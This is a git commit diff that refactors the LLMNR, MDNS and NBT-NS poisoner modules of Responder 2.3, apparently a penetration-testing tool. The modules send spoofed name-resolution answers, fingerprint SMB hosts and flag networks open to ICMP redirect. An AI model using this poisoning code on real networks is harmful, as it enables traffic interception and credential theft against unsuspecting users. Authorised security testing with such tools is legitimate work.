Refactor a bit the poisoners

2025-07-16 10:02:53 -07:00 · 2016-07-05 00:18:48 +02:00 · 2016-07-05 00:18:48 +02:00 · f2a2ffbe87
commit f2a2ffbe87
parent 04c841d34e
5 changed files with 42 additions and 72 deletions
--- a/poisoners/LLMNR.py
+++ b/poisoners/LLMNR.py
@ -14,28 +14,18 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import socket
 import struct
-import settings
 import fingerprint

 from packets import LLMNR_Ans
-from odict import OrderedDict
 from SocketServer import BaseRequestHandler
 from utils import *

+
 def Parse_LLMNR_Name(data):
 	NameLen = struct.unpack('>B',data[12])[0]
-	Name = data[13:13+NameLen]
-	return Name
+	return data[13:13+NameLen]

-def IsOnTheSameSubnet(ip, net):
-	net += '/24'
-	ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
-	netstr, bits = net.split('/')
-	netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16)
-	mask = (0xffffffff << (32 - int(bits))) & 0xffffffff
-	return (ipaddr & mask) == (netaddr & mask)

 def IsICMPRedirectPlausible(IP):
 	dnsip = []
@ -43,22 +33,19 @@ def IsICMPRedirectPlausible(IP):
 		ip = line.split()
 		if len(ip) < 2:
 		   continue
-		if ip[0] == 'nameserver':
+		elif ip[0] == 'nameserver':
 			dnsip.extend(ip[1:])
 	for x in dnsip:
-		if x !="127.0.0.1" and IsOnTheSameSubnet(x,IP) == False:
+		if x != "127.0.0.1" and IsOnTheSameSubnet(x,IP) is False:
 			print color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5)
 			print color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5)
 			print color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5)
-		else:
-			pass

 if settings.Config.AnalyzeMode:
 	IsICMPRedirectPlausible(settings.Config.Bind_To)

-# LLMNR Server class
-class LLMNR(BaseRequestHandler):

+class LLMNR(BaseRequestHandler):  # LLMNR Server class
 	def handle(self):
 		data, soc = self.request
 		Name = Parse_LLMNR_Name(data)
@ -68,24 +55,18 @@ class LLMNR(BaseRequestHandler):
 			return None

 		if data[2:4] == "\x00\x00" and Parse_IPV6_Addr(data):
-
+			Finger = None
 			if settings.Config.Finger_On_Off:
 				Finger = fingerprint.RunSmbFinger((self.client_address[0], 445))
-			else:
-				Finger = None

-			# Analyze Mode
 			if settings.Config.AnalyzeMode:
 				LineHeader = "[Analyze mode: LLMNR]"
 				print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)
-
-			# Poisoning Mode
-			else:
+			else:  # Poisoning Mode
 				Buffer = LLMNR_Ans(Tid=data[0:2], QuestionName=Name, AnswerName=Name)
 				Buffer.calculate()
 				soc.sendto(str(Buffer), self.client_address)
 				LineHeader = "[*] [LLMNR]"
-
 				print color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0], Name), 2, 1)

 			if Finger is not None:
--- a/poisoners/MDNS.py
+++ b/poisoners/MDNS.py
@ -15,8 +15,6 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import struct
-import settings
-import socket

 from SocketServer import BaseRequestHandler
 from packets import MDNS_Ans
@ -33,15 +31,14 @@ def Parse_MDNS_Name(data):
 	except IndexError:
 		return None

+
 def Poisoned_MDNS_Name(data):
 	data = data[12:]
-	Name = data[:len(data)-5]
-	return Name
+	return data[:len(data)-5]
+

 class MDNS(BaseRequestHandler):
-
 	def handle(self):
-
 		MADDR = "224.0.0.251"
 		MPORT = 5353

@ -52,14 +49,10 @@ class MDNS(BaseRequestHandler):
 		if (not Request_Name) or (RespondToThisHost(self.client_address[0], Request_Name) is not True):
 			return None

-		try:
-			# Analyze Mode
-			if settings.Config.AnalyzeMode:
+		if settings.Config.AnalyzeMode:  # Analyze Mode
 			if Parse_IPV6_Addr(data):
 				print text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0], 3), color(Request_Name, 3)))
-
-			# Poisoning Mode
-			else:
+		else:  # Poisoning Mode
 			if Parse_IPV6_Addr(data):

 				Poisoned_Name = Poisoned_MDNS_Name(data)
@ -68,6 +61,3 @@ class MDNS(BaseRequestHandler):
 				soc.sendto(str(Buffer), (MADDR, MPORT))

 				print color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name), 2, 1)
-
-		except Exception:
-			raise
--- a/poisoners/NBTNS.py
+++ b/poisoners/NBTNS.py
@ -14,8 +14,7 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import socket
-import settings
+
 import fingerprint

 from packets import NBT_Ans
@ -26,19 +25,14 @@ from utils import *
 def Validate_NBT_NS(data):
 	if settings.Config.AnalyzeMode:
 		return False
-
-	if NBT_NS_Role(data[43:46]) == "File Server":
+	elif NBT_NS_Role(data[43:46]) == "File Server":
 		return True
-
-	if settings.Config.NBTNSDomain:
+	elif settings.Config.NBTNSDomain:
 		if NBT_NS_Role(data[43:46]) == "Domain Controller":
 			return True
-
-	if settings.Config.Wredirect:
+	elif settings.Config.Wredirect:
 		if NBT_NS_Role(data[43:46]) == "Workstation/Redirector":
 			return True
-
-	else:
 	return False

 # NBT_NS Server class.
@ -54,19 +48,14 @@ class NBTNS(BaseRequestHandler):
 			return None

 		if data[2:4] == "\x01\x10":
-
+			Finger = None
 			if settings.Config.Finger_On_Off:
 				Finger = fingerprint.RunSmbFinger((self.client_address[0],445))
-			else:
-				Finger = None

-			# Analyze Mode
-			if settings.Config.AnalyzeMode:
+			if settings.Config.AnalyzeMode:  # Analyze Mode
 				LineHeader = "[Analyze mode: NBT-NS]"
 				print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)
-
-			# Poisoning Mode
-			else:
+			else:  # Poisoning Mode
 				Buffer = NBT_Ans()
 				Buffer.calculate(data)
 				socket.sendto(str(Buffer), self.client_address)
--- a/settings.py
+++ b/settings.py
@ -14,13 +14,12 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import os
-import sys
-import socket
+
 import utils
-import logging
 import ConfigParser

+from utils import *
+
 __version__ = 'Responder 2.3'

 class Settings:
--- a/utils.py
+++ b/utils.py
@ -50,6 +50,16 @@ def text(txt):

 	return '\r'+re.sub(r'\[([^]]*)\]', "\033[1;34m[\\1]\033[0m", txt)

+
+def IsOnTheSameSubnet(ip, net):
+	net += '/24'
+	ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
+	netstr, bits = net.split('/')
+	netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16)
+	mask = (0xffffffff << (32 - int(bits))) & 0xffffffff
+	return (ipaddr & mask) == (netaddr & mask)
+
+
 def RespondToThisIP(ClientIp):

 	if ClientIp.startswith('127.0.0.'):
@ -90,6 +100,7 @@ def OsInterfaceIsSupported():
 		return False if IsOsX() else True
 	else:
 		return False
+
 def IsOsX():
    Os_version = sys.platform
    if Os_version == "darwin":